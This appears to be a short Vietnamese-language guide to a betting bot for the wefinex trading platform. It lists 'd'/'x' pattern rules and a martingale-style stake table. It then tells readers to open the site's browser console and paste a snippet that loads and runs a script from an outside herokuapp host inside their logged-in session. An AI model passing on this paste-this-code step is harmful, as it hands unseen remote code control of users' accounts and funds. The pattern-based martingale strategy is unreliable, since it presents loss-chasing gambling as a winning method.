
FLow rule

var listRule = [
    "xxx->d",
    "xxxdx->d",
    "xxxdd->d",
    "xxxdxdx->d",
    "xxxdxdd->d",
    "xxxdddx->d",
    "xxxdddd->d",
    "xxxdxdxdx->d",
    "xxxdxdxdd->d",
    "xxxdxdddd->d",
    "xxxdxdddx->d",
    "xxxdddxdx->d",
    "xxxdddxdd->d",
    "xxxdddddx->d",
    "xxxdddddd->d",
	"ddd->x",
	"dddxd->x",
	"dddxx->x",
	"dddxdxd->x",
	"dddxdxx->x",
	"dddxxxd->x",
	"dddxxxx->x",
	"dddxdxdxd->x",
	"dddxdxdxx->x",
	"dddxdxxxx->x",
	"dddxdxxxd->x",
	"dddxxxdxd->x",
	"dddxxxdxx->x",
	"dddxxxxxd->x",
	"dddxxxxxx->x",
];

var lostValueSet = {
    0: 1,
    1: 2,
    2: 4,
    3: 6
};


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

3s cuoi danh

//check lost more > 3


var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v5-gapthep/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
